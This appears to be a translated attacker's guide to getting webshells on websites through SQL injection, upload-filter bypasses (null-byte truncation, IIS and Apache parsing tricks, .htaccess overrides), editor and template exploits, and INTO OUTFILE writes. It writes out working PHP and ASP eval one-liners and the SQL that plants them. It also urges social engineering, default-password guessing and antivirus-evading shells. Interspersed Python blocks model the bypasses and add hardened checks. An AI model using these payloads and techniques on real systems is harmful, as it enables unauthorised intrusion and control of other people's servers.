2022-08-02
A webshell is a command-execution environment that exists as a web page file (asp, php, jsp and so on); it can also be called a web backdoor. After breaking into a website, the attacker usually mixes asp or php backdoor files in among the normal page files under the server's web directory, then reaches the backdoor through a browser and so controls the web server.
1. Whatever the site and whatever the language, the first thing I do when I want to get in is scan directories, and better still scan for an upload point and upload the shell directly. Don't laugh: sometimes you spend a long time on a site only to find there was a ready-made, easily guessed upload point all along. This happens mostly on asp sites.
2. asp(aspx)+MSSQL: consider injection first. An ordinary injection with DBowner rights can write the shell directly; if you can't write, or the web server and database are separated, guess the data, go in through the backend, and upload or modify configuration files from there.
3. asp(aspx)+ACCESS: there are generally only 3 ways to get a shell. First, upload from the front end, or inject your way into the backend and upload there; second, inject into the backend and change the configuration file; third, inject into the backend and back up the database, or, once the database path is exposed and it turns out to be an asp or asa database, write a one-liner into it directly.
4. php+MYSQL: generally inject into the backend and upload; occasionally, with luck, the privileges are high enough that the injection can select into outfile. Then there is inclusion, local and remote: remote inclusion is not supported on newer php versions, so find a way to upload an image file locally or write into a log. Then there are the undisclosed vulnerabilities of the particular php program; with luck you can write the shell directly.
5. jsp+MYSQL: using the database to get access is basically the same as php, and jsp uploads rarely check the file suffix, so with an injection point and a backend, getting a shell is quite easy. I have not met many jsp+ORACLE sites; on those I did, I guessed the username and password and worked from the backend.
6. Whatever the site, the main site is generally well secured (otherwise it would have been owned already), so generally start from the second-level domains: guess some of the main site's usernames and passwords, get the main site's source code, or, after getting a server on the same network segment, side-hop with cain or arp spoofing.
7. Ordinary sites rarely use a ready-made CMS, so if you are lucky enough to find the source code you have hit the jackpot: injection vulnerabilities, upload bugs, file-write bugs, all in your hands. Watch the newly launched test sub-sites of the big sites; those are still under test and are easily taken.
8. Truncated upload filenames come in 2 kinds: 00 truncation and long-filename truncation (I used the latter in hw). Many file parameters can be 00-truncated, and it works every time. Don't forget the magic of uploading into a .asp directory (.asa, .cer and .cdx work too).
9. php sites, whether on windows or linux, all have the magic_quotes_gpc question. With magic_quotes_gpc on, injection through server variables or select into outfile may still be possible; a closed-source cms I did this year was exactly this case. Generally when it is on don't even think about writing files, but if you do have the privilege don't forget to read file source with load_file, because its argument can be encoded (a hex literal needs no quotes).
10. Guessing paths and files is essential in an intrusion. When you can't guess the path, don't forget google (baidu is poor, google is complete), and look at robot.txt or robots.txt under the site; there may be a surprise.
11. Tools matter: a WVS sweep before the intrusion helps. Injection tools are many but don't always work, and today's software and hardware firewalls filter injection more and more strictly, so don't be lazy; doing it by hand helps you grow.
12. Ever hit first-rate monitoring, or another kind of post firewall? Sometimes the one-liner can't be used to push up the big horse (大马). Then first learn to code, and learn to transform and bypass.
13. When I want to do a site, I check its copyright notice, find the company that built it, start with other sites built by that company, get the source code and come back. I once took a well-known pharmaceutical company's website this way.
14. Side-channel (旁注) thinking never goes out of style. With a dbowner injection you can comfortably write the shell onto the site you need and save yourself the trouble; with bad luck, go step by step: get a shell, escalate, and take what you need.
15. Never forget social engineering. Treat yourself as someone who knows nothing and start from the webmaster's qq number, identity details, email and so on; sometimes there is a surprise. Also don't forget the simple tries admin/admin, test/test, 123456/123456, and of course you can brute force.
16. Don't ignore XSS, don't ignore cookies. XSS can steal cookies and has other tricks, learn them; cookies can forge a login, cookies can be injected, and cookie injection bypasses most firewalls.
17. I collect paths, source code and tools from the many sites I do, filling out my own "arsenal". It is best to record your intrusion steps, or at least review them afterwards; I usually keep notes in a txt. Also, learn to draw inferences from one case to the next.
18. Study more, read more source code, read more published 0day. Scripting is the prerequisite for hacking, not tools; if all you can do is run tools, you haven't even begun.
II. Getting a webshell with admin rights (through the backend)
1. Ordinary upload of a webshell
The website does not filter the suffix of uploaded files, so the Webshell can be uploaded directly.
Here the site (a main shopping site) mostly did this for convenient management, commonly to push patches and firewall rules quickly and reduce exposure: no filtering on upload, only filtering after the file has reached the server (especially for files with passwords).
Usually upload into the include directory, because such directories normally hold many script files; give the uploaded file a name similar to a normal script and it blends in. This is mainly used for privilege escalation.
2. Getting a Webshell through database backup
When direct upload is impossible and only normal pictures can be uploaded, rename the picture through the database backup function.
If that cannot be modified, try changing the element in F12 (the browser developer tools) or 00 truncation.
3. Breaking through local validation to get a webshell
When the site uses js to restrict the types of files users may upload, we can delete the js validation or modify the allowed upload types to break through and upload the Webshell.
① Modify the restriction with firebug
② Delete the validation code with firebug
Or submit through a proxy such as burpsuite or fiddler: rename the local file to jpg, intercept the upload, and change the extension back to asp or php.
4. Uploading another script type to get a webshell
Applies to one server hosting several websites: site a is asp and site b is php, and site a only blocks uploads of asp files, so try uploading a php script to get a shell.
Likewise, upload the image and then change it to php; the system automatically adds asp and executes it.
Also try changing the script extension to asa, or add a dot straight after it, e.g. xxx.asp., to break through the file-type restriction and upload the webshell.
5. 00 truncation to get a webshell
When uploading, the site may automatically rename your file. In that case capture the upload packet and change the filename to xx.asp%00.jpg so the name is truncated, and take the webshell.
When the name is received via GET, %00 works directly. For a POST upload the %00 is not decoded by the server, so it has to become a real null byte in the request; note that the change is made in hex.
First add a space after the name, click hex, find the space (20) and change it to 00.
Or write %00 directly, select it, right-click and choose Convert selection > URL > URL-decode, then Go.
6. Exploiting parsing vulnerabilities to get a webshell
If a folder named .asp or .asa exists under the website (IIS 6), any file inside it is parsed and executed as asp, so if you can control the upload path there is no need to rename the jpg; you get the shell directly.
A filename such as xx.asp;.jpg uploads successfully because it ends in jpg, but when executed everything after the semicolon is ignored, so it runs as asp (capture and modify the packet).
Apache parses the name from right to left; if a suffix is not recognized it continues left.
For example 1.php.owf.rar: Apache does not recognize owf or rar, so the file is executed as php.
How to tell which suffixes are recognized: upload test1.php.rar.jpg… (append every known suffix) and test.
<?PHP fputs(fopen('xxx.php','w'),'<?php eval($_POST[a])?>');?>
Request 1.jpg/.php (php-cgi path-info parsing) and the one-liner xxx.php is produced in that directory.
If testing shows that .htaccess files can be uploaded and take effect, the opportunity is there:
AddType application/x-httpd-php .jpg
<FilesMatch "1.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
The .htaccess code above makes the uploaded file with the .jpg suffix be parsed as php.
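As an added illustration (not code from the original post), the following Python models the checks this section is about: a naive suffix blacklist of the kind the tricks above bypass, the suffix each server actually acts on (IIS 6 semicolon and .asp directories, 00 truncation, Apache's right-to-left handler lookup, php-cgi path info), and a hardened allowlist check done the way the server will see the name. The server models, extension sets and filenames are constructed for the example and are simplified from the real servers.

```python
import re

# Suffixes the servers in this section execute as script (constructed set).
SCRIPT_EXTS = {"asp", "asa", "cer", "cdx", "aspx", "php", "jsp"}
# Suffixes this (assumed) Apache has a handler for; anything else is "unknown",
# so Apache keeps walking left: 1.php.owf.rar -> rar? owf? php.
APACHE_KNOWN = SCRIPT_EXTS | {"jpg", "jpeg", "png", "gif", "txt", "html"}
SAFE_EXTS = {"jpg", "jpeg", "png", "gif"}
SAFE_STEM = re.compile(r"[A-Za-z0-9_-]{1,64}")


def naive_check(filename):
    """The weak server-side check: blacklist whatever follows the last dot."""
    return filename.rsplit(".", 1)[-1].lower() not in SCRIPT_EXTS


def _last_ext(segment):
    return segment.rsplit(".", 1)[-1].lower() if "." in segment else ""


def effective_ext(path, server):
    """Suffix the server really uses to choose a handler for `path`."""
    if "\x00" in path:                      # 00 truncation: C string APIs stop here
        path = path.split("\x00", 1)[0]
    if server == "iis6":
        path = path.split(";", 1)[0]        # xx.asp;.jpg -> xx.asp
        for seg in path.split("/"):         # a /x.asp/ directory taints everything in it
            if _last_ext(seg) in SCRIPT_EXTS:
                return _last_ext(seg)
        return _last_ext(path.rsplit("/", 1)[-1])
    if server == "apache":
        exts = path.rsplit("/", 1)[-1].split(".")[1:]
        for ext in reversed(exts):          # right to left until a known suffix
            if ext.lower() in APACHE_KNOWN:
                return ext.lower()
        return ""
    if server == "php_cgi":                 # 1.jpg/.php with cgi.fix_pathinfo=1
        segs = path.split("/")
        if len(segs) >= 2 and _last_ext(segs[-1]) == "php":
            return "php"
        return _last_ext(segs[-1])
    raise ValueError(f"unknown server model {server!r}")


def hardened_check(filename):
    """Allowlist check that sees the name the way the server will.

    Returns the normalised extension to store, or None to reject. The caller
    generates the stored name itself (e.g. a random token), so nothing the
    client chose survives into the path."""
    if any(c in filename for c in "\x00/\\;") or filename.startswith("."):
        return None                          # truncation, paths, IIS6 ';', .htaccess
    stem, dot, ext = filename.rpartition(".")
    if not dot or not SAFE_STEM.fullmatch(stem) or ext.lower() not in SAFE_EXTS:
        return None                          # no double extensions, no script suffixes
    return ext.lower()


def safe_to_serve(stored_path, server):
    """Second line of defence: the server must not execute the stored file."""
    return effective_ext(stored_path, server) in SAFE_EXTS


# Constructed cases: (name sent by the client, path later requested, server model)
BYPASSES = [
    ("xx.asp\x00.jpg", "xx.asp\x00.jpg", "iis6"),
    ("xx.asp;.jpg", "xx.asp;.jpg", "iis6"),
    ("1.jpg", "upload/x.asp/1.jpg", "iis6"),
    ("1.php.owf.rar", "1.php.owf.rar", "apache"),
    ("1.jpg", "1.jpg/.php", "php_cgi"),
]


def bypass_report():
    """For each case: did the naive check pass it, what will actually run,
    and would the hardened check plus the serving check have stopped it."""
    rows = []
    for name, requested, server in BYPASSES:
        rows.append({
            "name": name,
            "naive_passes": naive_check(name),
            "runs_as": effective_ext(requested, server),
            "hardened_accepts": hardened_check(name) is not None,
            "safe_to_serve": safe_to_serve(requested, server),
        })
    return rows


if __name__ == "__main__":
    for row in bypass_report():
        print(row)
```

Two of the five cases (the .asp directory and 1.jpg/.php) are accepted by the hardened name check because the uploaded name really is 1.jpg; there the flaw is server configuration, which is why `safe_to_serve` checks the stored path against the server model as well, and why upload directories should have script execution disabled regardless of the name check.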
7. Getting a webshell through the editor
Common editor vulnerabilities include fckeditor, ewebeditor, cheditor and others.
Exploiting modification rights (ewebeditor as the example):
1. Key filenames and paths; try the following pages:
admin_login.asp (default backend path)
admin_style.asp (check whether the file is directly accessible)
After the delete action in the style listing, append &dir=../../ and keep going until you reach the web root.
db/ewebeditor.mdb (default database path): download it, open it with a database tool, decrypt the administrator password and log in; in style management add a new style and set it to allow uploads of asp, asa and other script files.
Sometimes after adding a style the upload button does nothing; it may require a specific IE version (IE6 for example), in which case use a tool to simulate the IE6 environment.
8. Inserting a horse into the website configuration to get a webshell
Find the website's configuration page and insert a one-liner into the middle of a configuration value. To make the insertion succeed, download the site's source code first and read its filtering rules, so the insertion does not fail.
Be sure to close the surrounding string and tag:
"%><%eval request("xxxxx")%><%'
9. Getting a Webshell by editing templates
Write a one-liner through the site's template editor, then generate a script file from it to get the Webshell.
Or add the Trojan to a compressed archive, rename it to the site's template type, upload it to the web server and get the Webshell.
10. Modifying scripts to get a webshell directly
Some websites let you modify and add script files; that gives the WebShell directly.
11. Database command execution to get a WebShell
Log into the database through phpmyadmin and use database commands to write the one-liner WebShell:
1. Create a table
2. Write the one-liner into the table just created
3. Query the table holding the one-liner into a file; on success the one-liner is written to the file
Create TABLE study (cmd text NOT NULL);
INSERT INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
SELECT cmd FROM study INTO OUTFILE 'D:/phpstudy_pro/www/test/test.php';
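Whether the three statements above work depends on two MySQL settings the post does not mention, and they are worth checking before wasting time: the account needs the FILE privilege (SHOW GRANTS) and secure_file_priv (SHOW VARIABLES LIKE 'secure_file_priv') must permit the target directory. The Python below is an added example, not part of the original post; it encodes those rules for offline checking and builds the export statement with a path that is safe inside a MySQL string literal. The settings, paths and the table name are constructed.

```python
from pathlib import PureWindowsPath, PurePosixPath


def outfile_allowed(secure_file_priv, has_file_priv, target, windows=True):
    """Apply MySQL's rules for SELECT ... INTO OUTFILE.

    secure_file_priv: None (NULL: file import/export disabled), "" (no
    restriction) or a directory that every target must live under.
    Returns (allowed, reason)."""
    if not has_file_priv:
        return False, "account lacks the FILE privilege"
    if secure_file_priv is None:
        return False, "secure_file_priv is NULL: INTO OUTFILE is disabled"
    if secure_file_priv == "":
        return True, "secure_file_priv is empty: any path the server user can write"
    path_cls = PureWindowsPath if windows else PurePosixPath
    try:
        path_cls(target).relative_to(path_cls(secure_file_priv))
    except ValueError:
        return False, f"target is outside secure_file_priv ({secure_file_priv})"
    return True, "target is inside secure_file_priv"


def outfile_statement(table, column, target):
    """Build the export statement. Backslash is an escape character inside a
    MySQL string literal, so a Windows path is written with forward slashes,
    which the server accepts; a stray quote in the path is doubled."""
    path = target.replace("\\", "/").replace("'", "''")
    return f"SELECT {column} FROM {table} INTO OUTFILE '{path}';"


def webshell_write_plan(secure_file_priv, has_file_priv, target, windows=True):
    """Combine the check and the statement: the statement is only returned
    when the server would actually perform the write."""
    ok, reason = outfile_allowed(secure_file_priv, has_file_priv, target, windows)
    return (outfile_statement("study", "cmd", target) if ok else None), reason


if __name__ == "__main__":
    # Constructed settings: phpstudy-style Windows layout, FILE privilege held.
    for priv in ("", None, "D:/phpstudy_pro/www", "C:/mysql-files"):
        print(repr(priv), webshell_write_plan(priv, True, "D:/phpstudy_pro/www/test/test.php"))
```

The same function explains the defensive side: a MySQL 5.7+ default install ships secure_file_priv set to a dedicated directory (or NULL on some packages), which is exactly why this technique now mostly fails unless the DBA loosened it.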
12. Adding a static page to get a webshell
Use the directory of generated pages together with a parsing vulnerability.
Write the one-liner Trojan into a tag and generate the page.
13. File inclusion to get a webshell
First rename the Webshell to a txt (or jpg) file and upload it, then upload a script file that includes it; this bypasses the waf and gets the webshell.
<!--#include file="123.jpg"-->
<?php include("123.jpg"); ?>
Upload two files here, bao.asp and 1.jpg (the Trojan):
bao.asp: <!--#include file="1.jpg"-->
Because 1.jpg is an image format its code does not run on its own; request bao.asp instead, and bao.asp includes 1.jpg (the Trojan) and executes it as asp.
The including file and the included file must be in the same directory or it will not be found; if they are not in the same directory:
<!--#include virtual="directory-of-the-file/123.jpg"-->
<?php include("directory-of-the-file/1.jpg"); ?>
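The inclusion trick works because include cares about content, not suffix: whatever bytes 1.jpg holds run as code once it is included. As an added example (not from the post), the loader below resolves a requested template name against an allowlisted template directory and refuses anything that escapes it or does not carry the template extension, beside the naive join that the vulnerable include performs. The directory, names and extension are constructed, and plain path normalisation is used instead of symlink resolution so the code runs without a filesystem (a production loader would also realpath the result).

```python
import posixpath

TEMPLATE_DIR = "/var/www/templates"     # constructed; the only place includes may come from
TEMPLATE_EXT = ".html"                  # constructed template suffix


def vulnerable_include_target(requested, base_dir=TEMPLATE_DIR):
    """What `include($requested)` effectively does: joins and trusts the name,
    so ../uploads/1.jpg resolves and its contents run as code."""
    return posixpath.normpath(posixpath.join(base_dir, requested))


def resolve_include(requested, base_dir=TEMPLATE_DIR, ext=TEMPLATE_EXT):
    """Return the absolute path to include, or None if the request is rejected.

    Rejects null bytes, absolute paths, anything that normalises to a location
    outside base_dir (../uploads/1.jpg), and any suffix other than `ext`, so an
    uploaded image can never be reached through this loader."""
    if "\x00" in requested or posixpath.isabs(requested):
        return None
    base = posixpath.normpath(base_dir)
    target = posixpath.normpath(posixpath.join(base, requested))
    # commonpath, not a string prefix: /var/www/templates2 must not pass
    if target == base or posixpath.commonpath([base, target]) != base:
        return None
    if not target.endswith(ext):
        return None
    return target


if __name__ == "__main__":
    # Constructed requests: one legitimate template and the inclusion payloads from the text.
    for name in ("header.html", "../uploads/1.jpg", "../uploads/123.jpg",
                 "/etc/passwd", "header.html\x00.jpg"):
        print(name.encode(), vulnerable_include_target(name), resolve_include(name))
```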
14. Other ways to get a webshell
Take WordPress as an example: under Appearance, open the editor, edit the 404 template and insert a one-liner; if you don't know which directory 404.php is in, look at another template.
Uploading a plugin webshell
Find a complete theme or plugin, write the one-liner into some small hidden corner of it, compress it and upload.
Uploading a special horse: an AV-evading (免杀) webshell.
Uploading the shell after running it through AV-evasion (免杀) tooling.
III. Getting a webshell with ordinary rights (without entering the backend)
1. 0day to get a webshell
The newest one I could find was still a bug from 24 days earlier.
Reference tool: DedeCMS (织梦) exploit gadget
2. Modifying the site's upload-type configuration to get a WebShell
Some websites restrict script-type uploads in the upload-type setting; we can add upload file types such as asp | php | jsp | aspx | asa
suffixes and then get the WebShell.
3. IIS write permission to get a WebShell
Some administrators are careless when configuring website permissions and leave us write permission. Find a site with IIS write permission (WebDAV), PUT a txt-format file into a directory that has to be writable, such as the image folder, and then use the MOVE method to rename the txt Trojan to a script extension such as xxx.php.
Reference tool: IIS put scanner.
4. Remote command execution to get a webshell
When an application needs to call external programs to process content, it uses functions that execute system commands, such as system, exec and shell_exec in PHP. When the arguments of such a function can be controlled, malicious system commands can be injected into the normal command, causing a command-execution attack.
<?php
$x = $_GET['z'];      // attacker-controlled parameter z, taken straight from the request
echo "<pre>";
echo shell_exec($x);  // handed to the shell as-is
echo "</pre>";
?>
Then access this php file in the browser with a z parameter whose command writes the one-liner Trojan into cracer.php:
Then open that php file in the browser and connect to it with China Chopper (菜刀).
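An added example (not the post's PHP and not a real application): the same shape of flaw in Python beside a hardened version. The vulnerable function reproduces shell_exec($x), a single string handed to a shell, so a z value such as 127.0.0.1; echo ... > cracer.php becomes two commands. The hardened version allowlists the one value the feature needs and passes an argument vector, never a shell command line. The inputs are constructed; `run_hardened` is the only function that executes anything and the checks do not call it.

```python
import re
import subprocess

# Characters that change how /bin/sh or cmd.exe reads a command line (constructed, not exhaustive).
SHELL_METACHARS = set(";|&`$()<>\n")
# Hostname allowlist: alphanumerics, dots and dashes, no leading dash (would become an option).
HOST_RE = re.compile(r"[A-Za-z0-9]([A-Za-z0-9.-]{0,251}[A-Za-z0-9])?")


def vulnerable_command(user_value):
    """Mirror of `shell_exec($x)`: the user string is spliced into the
    command line that the shell will parse."""
    return "ping -c 1 " + user_value      # would be run with shell=True


def shell_metachars(user_value):
    """What a filter (or a WAF rule) would have to catch in this value."""
    return {c for c in user_value if c in SHELL_METACHARS}


def hardened_argv(host):
    """Allowlist the hostname and build an argv; the shell never sees it, so
    metacharacters have no meaning."""
    if not HOST_RE.fullmatch(host):
        raise ValueError("host rejected by allowlist")
    return ["ping", "-c", "1", host]


def run_hardened(host, timeout=5):
    """Execute with shell=False; only reachable with an allowlisted host."""
    return subprocess.run(hardened_argv(host), capture_output=True,
                          text=True, timeout=timeout, check=False).stdout


def assess(user_value):
    """Side-by-side view for one input: what the vulnerable path would run,
    which metacharacters it carries, and whether the hardened path accepts it."""
    try:
        argv = hardened_argv(user_value)
    except ValueError:
        argv = None
    return {"vulnerable_cmdline": vulnerable_command(user_value),
            "metachars": shell_metachars(user_value),
            "hardened_argv": argv}


if __name__ == "__main__":
    # Constructed inputs: a benign host and the kind of value the z parameter above carries.
    for v in ("example.com", "127.0.0.1; echo '<?php eval($_POST[cmd])?>' > cracer.php"):
        print(assess(v))
```

Blacklisting metacharacters (what `shell_metachars` shows) is what the "post firewalls" in part I do, and it is the weaker option: encodings, newlines and interpreter-specific syntax keep slipping past it, whereas an argv plus an allowlist leaves nothing for the shell to interpret.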
5. Upload vulnerabilities to get a webshell
Some sites let you upload pictures, attachments, files and so on.
Principle: after registering, some sites allow users to upload avatars, attachments and files; this can be used to upload the Webshell.
6. SQL injection to get a webshell
Preconditions: sufficient privileges, write permission on the folder the Trojan is written to, and knowledge of the site's absolute path.
For mssql injection, the site can be shelled through log backup or differential backup.
For mysql injection, the one-liner can be written with into outfile to get the Webshell.
7. struts2 to get a Webshell
8. Breaking local JS validation to get a Webshell
When the site uses JS to restrict the types of files users may upload, delete the JS file or change the allowed upload type to break the limit and get the Webshell.
Reference tools: submit through the burpsuite or fiddler proxy, rename the local file to XXX.jpg, intercept the upload, and change the filename suffix to php.
IV. Common backend site architectures
WordPress can also be used as a content management system (CMS).
1. Change the template
Reproduction: Step 1: under theme upload, upload a theme zip; the theme must contain the Trojan code.
A zip named qiesi was uploaded; after success the Trojan is automatically decompressed.
dede is short for DedeCMS (织梦 content management system), an open-source PHP website management system and the PHP CMS with the most users.
Step 1: under file upload, upload the Trojan directly.
Step 2: under Generate -> Update homepage HTML, change htm to php and update.
Step 1: under Templates -> Ad management -> Add advertisement.
Southern Data (南方数据) Enterprise Website Management System V18: official main site, enterprise website SQL edition, enterprise website management system, enterprise site-building system, Southern Data enterprise CMS, enterprise website SEO, website optimization, SEO search engine optimization, self-service site building; the whole front end uses automatically generated static html page templates.
A new generation of enterprise e-commerce system developed by the well-known domestic CMS and e-commerce management software developer Kechuang Network Studio, which also provides web page templates, enterprise website templates, a free enterprise website system, an automatic site builder and an all-round enterprise website system.
Step 1: under News -> Add news -> upload.
Step 1: under System management -> Constant settings, insert the code.
Pageadmin CMS
The PageAdmin CMS system is a .Net-based website management system, secure, stable and flexible, with over a million users nationwide, providing content management solutions for enterprise, school and government websites.
1. Self-extracting getshell
Step 1: under file management, choose a template to upload, then upload a zip file containing the Trojan.
Step 3: verify; the database can be used for command execution.
